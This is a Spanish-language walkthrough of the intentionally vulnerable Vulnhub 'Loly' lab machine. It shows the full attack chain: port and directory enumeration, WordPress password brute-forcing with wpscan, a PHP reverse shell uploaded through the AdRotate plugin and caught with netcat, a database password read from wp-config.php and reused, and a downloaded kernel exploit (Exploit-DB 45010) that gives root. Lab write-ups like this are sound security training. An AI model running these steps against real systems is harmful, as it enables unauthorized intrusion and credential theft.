[VULNHUB] Loly

Hoy vamos a hackear la maquina de Vulnhub llamada Loly. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/loly-1,538/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@aLiCe:~$ nmap -A -p- 192.168.146.132 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 22:03 CEST Nmap scan report for 192.168.146.132 Host is up (0.00072s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Welcome to nginx! Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds
    Vemos que solo tiene abierto el puerto 80, asi que lo exploramos un poco mas.
    sml@aLiCe:~$ gobuster dir -u http://192.168.146.132 -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.146.132 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/09/12 22:05:56 Starting gobuster =============================================================== /wordpress (Status: 301) =============================================================== 2020/09/12 22:05:58 Finished ===============================================================
    Vemos que tiene el directorio "wordpress". Enumeramos los usuarios con:
    wpscan --url http://192.168.146.132/wordpress --enumerate -u
    Vemos que aparece el usuario "loly". Hacemos bruteforce al usuario loly para ver si obtenemos su password para acceder a wordpress.
    sml@aLiCe:~$ wpscan --url http://192.168.146.132/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.2 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.146.132/wordpress/ [192.168.146.132] [+] Started: Sat Sep 12 22:10:43 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: nginx/1.10.3 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.146.132/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce ss [+] http://192.168.146.132/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <======================================> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc against 1 user/s [SUCCESS] - loly / fernando Trying loly / corazon Time: 00:00:01 <=========================================> (175 / 175) 100.00% Time: 00:00:01 [!] Valid Combinations Found: | Username: loly, Password: fernando [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Sat Sep 12 22:11:00 2020 [+] Requests Done: 200 [+] Cached Requests: 25 [+] Data Sent: 96.89 KB [+] Data Received: 109.146 KB [+] Memory used: 951.316 MB [+] Elapsed time: 00:00:17
    Encontramos el password: fernando. Al acceder a http://192.168.146.132/wordpress/wp-admin vemos que nos redirige a loly.lc. Agregamos loly.lc a nuestro fichero /etc/hosts. Una vez agregado, nos logueamos en wordpress utilizando los crendeciales. Vemos que tiene instalado el plugin Adrotate. Vamos a Adrotate -> Manage Media. En nuestra maquina, preparamos una reverse shell en php y luego la comprimimos como un fichero .zip
    sml@aLiCe:~$ cp /usr/share/webshell/php/php-reverse-shell.php . sml@aLiCe:~$ mv php-reverse-shell.php rshell.php sml@aLiCe:~$ nano rshell.php sml@aLiCe:~$ zip rshell.zip rshell.php adding: rshell.php (deflated 59%) sml@aLiCe:~$
    Subimos el fichero .zip utilizando Adrotate Manage Media. Ponemos nc a la escucha:
    sml@aLiCe:~$ nc -nlvp 1234 listening on [any] 1234 ...
    Accedemos a: http://loly.lc/wordpress/wp-content/banners/rshell.php
  • Low Shell
  • sml@aLiCe:~$ nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.146.131] from (UNKNOWN) [192.168.146.132] 59286 Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux 13:47:01 up 44 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    Exploramos el sistema y miramos el fichero wp-config.php del directorio de wordpress para ver si obtenemos algun credencial.
    www-data@ubuntu:/$ cat /var/www/html/wordpress/wp-config.php ---SNIP--- /** MySQL database username */ define( 'DB_USER', 'wordpress' ); /** MySQL database password */ define( 'DB_PASSWORD', 'lolyisabeautifulgirl' ); ---SNIP---
    Encontramos una password :) En el sistema existe el usuario llamado loly asi que probamos a loguearnos como loly usando la password recien encontrada.
    su loly Password: lolyisabeautifulgirl loly@ubuntu:~$
    Ya somos loly! Seguimos explorando el sistema.
    loly@ubuntu:~$ cat /etc/issue Ubuntu 16.04.1 LTS \n \l loly@ubuntu:~$ uname -a Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  • Privilege Escalation
  • Vemos que es un Ubuntu 16.04 y con Kernel 4.4.0-31. Buscamos un exploit y encontramos[1] Lo descargamos en nuestra maquina y lo transferimos a la maquina victima.
    loly@ubuntu:~$ wget http://192.168.146.131/45010.c wget http://192.168.146.131/45010.c --2020-09-12 15:05:47-- http://192.168.146.131/45010.c Connecting to 192.168.146.131:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13728 (13K) [application/octet-stream] Saving to: ‘45010.c’ 45010.c 100%[===================>] 13.41K --.-KB/s in 0s 2020-09-12 15:05:47 (443 MB/s) - ‘45010.c’ saved [13728/13728]
    Compilamos.
    loly@ubuntu:~$ gcc -o 4 45010.c
    Y ejecutamos!
    loly@ubuntu:~$ ./4 ./4 [.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t) [.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel ** [.] [*] creating bpf map [*] sneaking evil bpf past the verifier [*] creating socketpair() [*] attaching bpf backdoor to socket [*] skbuff => ffff88007973af00 [*] Leaking sock struct from ffff880075daddc0 [*] Sock->sk_rcvtimeo at offset 472 [*] Cred structure at ffff880072e50840 [*] UID from cred structure: 1000, matches the current: 1000 [*] hammering cred structure at ffff880072e50840 [*] credentials patched, launching shell... # id id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare) ,1000(loly)
  • root.txt
  • # cd /root # ls root.txt # cat root.txt ____ ____ ____ ____ / ___| _ _ _ __ / ___/ ___|| _ \ \___ \| | | | '_ \| | \___ \| |_) | ___) | |_| | | | | |___ ___) | _ < |____/ \__,_|_| |_|\____|____/|_| \_\ Congratulations. I'm BigCityBoy
  • End
  • Y con esto ya seriamos root de la maquina. [1]https://www.exploit-db.com/exploits/45010